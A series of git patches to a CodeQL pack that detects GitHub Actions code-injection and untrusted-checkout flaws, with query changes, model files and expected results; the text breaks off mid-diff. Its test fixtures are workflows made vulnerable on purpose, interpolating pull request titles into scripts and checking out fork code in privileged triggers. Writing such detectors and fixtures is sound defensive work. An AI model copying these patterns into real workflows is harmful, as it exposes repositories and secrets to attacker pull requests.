b/ql/src/qlpack.yml index 90647d42240..f36c119e720 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.3 +version: 0.0.4 groups: - actions - queries From 8023a527a40d8dff50ec949bcba3f7ef6a76567f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 18 Mar 2024 13:02:11 +0100 Subject: [PATCH 0132/1267] fix(untrusted_co): Do not report Reusable workflows called from pull_request --- ql/src/Security/CWE-829/UntrustedCheckout.ql | 24 ++++- .../.github/workflows/changelog_from_prt.yml | 100 ++++++++++++++++++ .../workflows/changelog_required_prt.yml | 9 ++ 3 files changed, 128 insertions(+), 5 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 1be8a6ea0f5..b33c7325526 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -1,6 +1,6 @@ /** * @name Checkout of untrusted code in trusted context - * @description Workflows triggered on `pull_request_target` have read/write access to the base repository and access to secrets. + * @description Priveleged workflows have read/write access to the base repository and access to secrets. * By explicitly checking out and running the build script from a fork the untrusted code is running in an environment * that is able to push to the base repository and to access secrets. * @kind problem @@ -121,12 +121,26 @@ class GitCheckout extends PRHeadCheckoutStep instanceof Run { } } +predicate isSingleTriggerWorkflow(Workflow w, string trigger) { + w.getATriggerEvent() = trigger and + count(string t | w.getATriggerEvent() = t | t) = 1 +} + from Workflow w, PRHeadCheckoutStep checkout where - w.hasTriggerEvent([ - "pull_request_target", "issue_comment", "pull_request_review_comment", "pull_request_review", - "workflow_run", "check_run", "check_suite", "workflow_call" - ]) and + ( + // The Workflow is triggered by an event other than `pull_request` + not isSingleTriggerWorkflow(w, "pull_request") + or + // The Workflow is only triggered by `workflow_call` and there is + // a caller workflow triggered by an event other than `pull_request` + isSingleTriggerWorkflow(w, "workflow_call") and + exists(ExternalJob call, Workflow caller | + call.getCallee() = w.getLocation().getFile().getRelativePath() and + caller = call.getWorkflow() and + not isSingleTriggerWorkflow(caller, "pull_request") + ) + ) and w.getAJob().(LocalJob).getAStep() = checkout and not exists(ControlCheck check | checkout.getIf() = check or checkout.getEnclosingJob().getIf() = check diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml new file mode 100644 index 00000000000..0ee850f183d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_from_prt.yml @@ -0,0 +1,100 @@ +name: changelog + +on: + workflow_call: + inputs: + create: + description: Add a log to the changelog + type: boolean + required: false + default: false + update: + description: Update the existing changelog + type: boolean + required: false + default: false + +jobs: + changelog: + runs-on: ubuntu-latest + env: + file: CHANGELOG.md + steps: + - uses: actions/checkout@v3 + with: + fetch-depth: 0 + - name: Check ${{ env.file }} + run: | + if [[ $(git diff --name-only origin/master HEAD -- ${{ env.file }} | grep '^${{ env.file }}$' -c) -eq 0 ]]; then + echo "Expected '${{ env.file }}' to be modified" + exit 1 + fi + update: + runs-on: ubuntu-latest + needs: changelog + if: (inputs.create && failure()) || (inputs.update && success()) + continue-on-error: true + env: + file: CHANGELOG.md + next_version: next + link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' + steps: + - uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + - name: Update ${{ env.file }} from PR title + id: update + uses: actions/github-script@v6 + env: + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + with: + result-encoding: string + script: | + const fs = require('fs'); + const file = './${{ env.file }}'; + let content = fs.readFileSync(file).toString(); + const title = '[${{ env.next_version }}]'; + const log = '${{ env.log }}'; + let exists = ${{ needs.changelog.result == 'success' }}; + + if (!content.includes(title)) { + const insertAt = content.indexOf('\n') + 1; + content = + content.slice(0, insertAt) + + `\n## ${title}\n\n\n` + + content.slice(insertAt); + } + + const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; + if (exists && ${{ github.event.action == 'edited' }}) { + const prevLog = '${{ env.prev_log }}'; + const index = content.indexOf(prevLog, insertAt); + if (index > -1) { + content = content.slice(0, index) + content.slice(index + prevLog.length); + exists = false; + } + } + + if (!exists) { + content = content.slice(0, insertAt) + log + content.slice(insertAt); + fs.writeFileSync(file, content); + return true; + } + + return false; + - name: Setup node + if: fromJson(steps.update.outputs.result) + uses: actions/setup-node@v3 + with: + node-version: 18.x + - name: Commit & Push + if: fromJson(steps.update.outputs.result) + run: | + npm ci + npx prettier --write ${{ env.file }} + git config user.name github-actions[bot] + git config user.email github-actions[bot]@users.noreply.github.com + git add ${{ env.file }} + git commit -m "update ${{ env.file }}" + git push diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml new file mode 100644 index 00000000000..8a3b1b02a63 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/changelog_required_prt.yml @@ -0,0 +1,9 @@ +name: '📋' + +on: + pull_request_target: + branches: [master] + +jobs: + changelog: + uses: ./.github/workflows/changelog_from_prt.yml From 9683ae35bcee5b8a9ce3118edf08ca9039cf1044 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 18 Mar 2024 13:04:57 +0100 Subject: [PATCH 0133/1267] Add tests --- ql/test/query-tests/Security/CWE-094/CodeInjection.expected | 4 ++++ .../Security/CWE-094/PrivilegedCodeInjection.expected | 4 ++++ 2 files changed, 8 insertions(+) diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 14b0c535ac6..2ad85054803 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -4,6 +4,7 @@ edges | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | +| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | @@ -66,6 +67,8 @@ nodes | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | +| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | @@ -205,6 +208,7 @@ subpaths | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | ${{ steps.changed-files.outputs.all_changed_files }} | | .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index bdb5ae3ea55..e818ced0c1d 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -4,6 +4,7 @@ edges | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | +| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | | .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | @@ -66,6 +67,8 @@ nodes | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/changelog.yml:58:26:58:39 | env.log | semmle.label | env.log | +| .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | semmle.label | env.log | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | @@ -204,6 +207,7 @@ subpaths #select | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | | .github/workflows/changelog.yml:58:26:58:39 | env.log | .github/workflows/changelog.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/changelog.yml:58:26:58:39 | env.log | ${{ env.log }} | +| .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | .github/workflows/changelog_from_prt.yml:49:19:49:56 | github.event.pull_request.title | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/changelog_from_prt.yml:58:26:58:39 | env.log | ${{ env.log }} | | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | From 874e45e3e526b1e35415f76b60a1a828bb4eee6d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 18 Mar 2024 13:22:53 +0100 Subject: [PATCH 0134/1267] feat(sources): New sources This PR also adds the ability to not limit a source to a trigger event --- ql/lib/ext/trilom_file-changes-action.model.yml | 11 +++++++++++ ql/src/Security/CWE-094/PrivilegedCodeInjection.ql | 1 + 2 files changed, 12 insertions(+) create mode 100644 ql/lib/ext/trilom_file-changes-action.model.yml diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml new file mode 100644 index 00000000000..db3d3759782 --- /dev/null +++ b/ql/lib/ext/trilom_file-changes-action.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sourceModel + data: + # https://github.com/trilom/file-changes-action + # if `prNumber` is provided, the trigger event dont need to be `pull_request_target` + - ["trilom/file-changes-action", "*", "output.files", "*", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_added", "*", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_modified", "*", "PR changed files"] + - ["trilom/file-changes-action", "*", "output.files_removed", "*", "PR changed files"] diff --git a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql index 69ab240616e..32f292f2200 100644 --- a/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql +++ b/ql/src/Security/CWE-094/PrivilegedCodeInjection.ql @@ -24,6 +24,7 @@ where w = source.getNode().asExpr().getEnclosingWorkflow() and ( w instanceof ReusableWorkflow or + source.getNode().(RemoteFlowSource).getATriggerEvent() = "*" or w.hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) ) select sink.getNode(), source, sink, From 06747cd98b7c3d48070ae06be902940f734895cc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 21 Mar 2024 14:16:11 +0100 Subject: [PATCH 0135/1267] Add tests for untrusted checkouts in workflow_run triggered workflows --- .../codeql/actions/dataflow/FlowSources.qll | 3 +++ .../workflow_run_untrusted_checkout.yml | 19 +++++++++++++++++++ .../CWE-829/UntrustedCheckout.expected | 2 ++ 3 files changed, 24 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 007ace43bd0..ab2466bc41b 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -106,7 +106,10 @@ private predicate isExternalUserControlledWorkflowRun(string context) { [ "github\\.event\\.workflow\\.path", "github\\.event\\.workflow_run\\.head_branch", "github\\.event\\.workflow_run\\.display_title", + "github\\.event\\.workflow_run\\.head_branch", "github\\.event\\.workflow_run\\.head_repository\\.description", + "github\\.event\\.workflow_run\\.head_repository\\.full_name", + "github\\.event\\.workflow_run\\.head_repository\\.name", "github\\.event\\.workflow_run\\.head_commit\\.message", "github\\.event\\.workflow_run\\.head_commit\\.author\\.email", "github\\.event\\.workflow_run\\.head_commit\\.author\\.name", diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml new file mode 100644 index 00000000000..c802355d102 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml @@ -0,0 +1,19 @@ +on: + workflow_run: + workflows: ['Test'] + types: [completed] + +jobs: + build: + runs-on: ubuntu-latest + if: github.event.workflow_run.conclusion == "success" + env: + HEAD: ${{ github.event.workflow_run.head.sha }} + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.workflow_run.head.sha }} + - uses: actions/checkout@v2 + with: + ref: ${{ env.HEAD }} + diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected index cf9d6c01d49..dc457c6a8a7 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckout.expected @@ -20,3 +20,5 @@ | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/untrusted_checkout.yml:13:9:15:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From 2ed3aceddfefcb329bf03335b4d9c6f68b08811e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 22 Mar 2024 13:32:29 +0100 Subject: [PATCH 0136/1267] feat(sources): Do not take triggers into consideration --- .../codeql/actions/dataflow/ExternalFlow.qll | 11 +-- .../codeql/actions/dataflow/FlowSources.qll | 38 ++------- .../dataflow/internal/DataFlowPrivate.qll | 6 +- .../internal/ExternalFlowExtensions.qll | 4 +- ql/lib/ext/TEST-RW-MODELS.model.yml | 2 +- ...ahmadnassri_action-changed-files.model.yml | 4 +- ...nnn_action-semantic-pull-request.model.yml | 2 +- ql/lib/ext/cypress-io_github-action.model.yml | 2 +- ...dawidd6_action-download-artifact.model.yml | 2 +- ql/lib/ext/dorny_paths-filter.model.yml | 2 +- ...nzdiebold_github-env-vars-action.model.yml | 4 +- .../ext/jitterbit_get-changed-files.model.yml | 14 ++-- ...han_pull-request-comment-trigger.model.yml | 4 +- ql/lib/ext/tj-actions_branch-names.model.yml | 6 +- ql/lib/ext/tj-actions_changed-files.model.yml | 34 ++++---- .../tj-actions_verify-changed-files.model.yml | 2 +- ql/lib/ext/tzkhan_pr-update-action.model.yml | 2 +- .../xt0rted_slash-command-action.model.yml | 4 +- .../CWE-078/PrivilegedCommandInjection.ql | 10 ++- .../CWE-094/PrivilegedCodeInjection.ql | 10 ++- ql/test/library-tests/test.expected | 82 +++++++++---------- ql/test/library-tests/test.ql | 4 +- .../.github/workflows/pull_request_target.yml | 4 +- .../CWE-094/PrivilegedCodeInjection.expected | 8 ++ 24 files changed, 123 insertions(+), 138 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 08f8b6b9363..c1c93221d1a 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -8,10 +8,9 @@ private import actions * - action: Fully-qualified action name (NWO) * - version: Either '*' or a specific SHA/Tag * - output arg: To node (prefixed with either `env.` or `output.`) - * - trigger: Triggering event under which this model introduces tainted data. Use `*` for any event. */ -predicate sourceModel(string action, string version, string output, string trigger, string kind) { - Extensions::sourceModel(action, version, output, trigger, kind) +predicate sourceModel(string action, string version, string output, string kind) { + Extensions::sourceModel(action, version, output, kind) } /** @@ -39,11 +38,9 @@ predicate sinkModel(string action, string version, string input, string kind) { Extensions::sinkModel(action, version, input, kind) } -predicate externallyDefinedSource( - DataFlow::Node source, string sourceType, string fieldName, string trigger -) { +predicate externallyDefinedSource(DataFlow::Node source, string sourceType, string fieldName) { exists(Uses uses, string action, string version, string kind | - sourceModel(action, version, fieldName, trigger, kind) and + sourceModel(action, version, fieldName, kind) and uses.getCallee() = action.toLowerCase() and ( if version.trim() = "*" diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index ab2466bc41b..699b5f6f6c3 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -18,8 +18,6 @@ abstract class RemoteFlowSource extends SourceNode { /** Gets a string that describes the type of this remote flow source. */ abstract string getSourceType(); - abstract string getATriggerEvent(); - override string getThreatModel() { result = "remote" } } @@ -122,33 +120,20 @@ private predicate isExternalUserControlledWorkflowRun(string context) { } private class EventSource extends RemoteFlowSource { - string trigger; - EventSource() { exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() | - trigger = ["issues", "issue_comment"] and isExternalUserControlledIssue(context) - or - trigger = ["pull_request_target", "pull_request_review", "pull_request_review_comment"] and - isExternalUserControlledPullRequest(context) - or - trigger = ["pull_request_review"] and isExternalUserControlledReview(context) - or - trigger = ["pull_request_review_comment", "issue_comment", "discussion_comment"] and - isExternalUserControlledComment(context) - or - trigger = ["gollum"] and isExternalUserControlledGollum(context) - or - trigger = ["push"] and isExternalUserControlledCommit(context) - or - trigger = ["discussion", "discussion_comment"] and isExternalUserControlledDiscussion(context) - or - trigger = ["workflow_run"] and isExternalUserControlledWorkflowRun(context) + isExternalUserControlledIssue(context) or + isExternalUserControlledPullRequest(context) or + isExternalUserControlledReview(context) or + isExternalUserControlledComment(context) or + isExternalUserControlledGollum(context) or + isExternalUserControlledCommit(context) or + isExternalUserControlledDiscussion(context) or + isExternalUserControlledWorkflowRun(context) ) } override string getSourceType() { result = "User-controlled events" } - - override string getATriggerEvent() { result = trigger } } /** @@ -156,13 +141,10 @@ private class EventSource extends RemoteFlowSource { */ private class ExternallyDefinedSource extends RemoteFlowSource { string sourceType; - string trigger; - ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _, trigger) } + ExternallyDefinedSource() { externallyDefinedSource(this, sourceType, _) } override string getSourceType() { result = sourceType } - - override string getATriggerEvent() { result = trigger } } /** @@ -174,6 +156,4 @@ private class CompositeActionInputSource extends RemoteFlowSource { CompositeActionInputSource() { c.getAnInput() = this.asExpr() } override string getSourceType() { result = "Composite action input" } - - override string getATriggerEvent() { result = "*" } } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index f1657717e04..11b8bf94bca 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -175,7 +175,7 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(Uses astFrom, StepsExpression astTo | - externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _) and + externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getTarget() = astFrom @@ -192,7 +192,7 @@ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { */ predicate needsCtxLocalStep(Node nodeFrom, Node nodeTo) { exists(Uses astFrom, NeedsExpression astTo | - externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _) and + externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName()) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getTarget() = astFrom @@ -232,7 +232,7 @@ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( - externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName(), _) or + externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName()) or astTo.getTarget() = astFrom ) ) diff --git a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll index 93ec64b059e..89cf4de0261 100644 --- a/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll +++ b/ql/lib/codeql/actions/dataflow/internal/ExternalFlowExtensions.qll @@ -5,9 +5,7 @@ /** * Holds if a source model exists for the given parameters. */ -extensible predicate sourceModel( - string action, string version, string output, string trigger, string kind -); +extensible predicate sourceModel(string action, string version, string output, string kind); /** * Holds if a summary model exists for the given parameters. diff --git a/ql/lib/ext/TEST-RW-MODELS.model.yml b/ql/lib/ext/TEST-RW-MODELS.model.yml index 44897ef3311..4ff387b1c5a 100644 --- a/ql/lib/ext/TEST-RW-MODELS.model.yml +++ b/ql/lib/ext/TEST-RW-MODELS.model.yml @@ -9,7 +9,7 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["octo-org/source-repo/.github/workflows/workflow.yml", "*", "output.workflow-output", "*", "Foo"] + - ["octo-org/source-repo/.github/workflows/workflow.yml", "*", "output.workflow-output", "Foo"] - addsTo: pack: githubsecuritylab/actions-all extensible: sinkModel diff --git a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml index 34cb56a01ad..aabd5a3ce36 100644 --- a/ql/lib/ext/ahmadnassri_action-changed-files.model.yml +++ b/ql/lib/ext/ahmadnassri_action-changed-files.model.yml @@ -3,5 +3,5 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["ahmadnassri/action-changed-files", "*", "output.files", "pull_request_target", "PR changed files"] - - ["ahmadnassri/action-changed-files", "*", "output.json", "pull_request_target", "PR changed files"] + - ["ahmadnassri/action-changed-files", "*", "output.files", "PR changed files"] + - ["ahmadnassri/action-changed-files", "*", "output.json", "PR changed files"] diff --git a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml index c530a3af9b3..638ff449735 100644 --- a/ql/lib/ext/amannn_action-semantic-pull-request.model.yml +++ b/ql/lib/ext/amannn_action-semantic-pull-request.model.yml @@ -3,4 +3,4 @@ extensions: pack: githubsecuritylab/actions-all extensible: sourceModel data: - - ["amannn/action-semantic-pull-request", "*", "output.error_message", "pull_request_target", "PR title"] + - ["amannn/action-semantic-pull-request", "*", "output.error_message", "PR title"] diff --git a/ql/lib/ext/cypress-io_github-action.model.yml b/ql/lib/ext/cypress-io_github-action.model.yml index 2fda092f20a..0aaa1b0722a 100644 --- 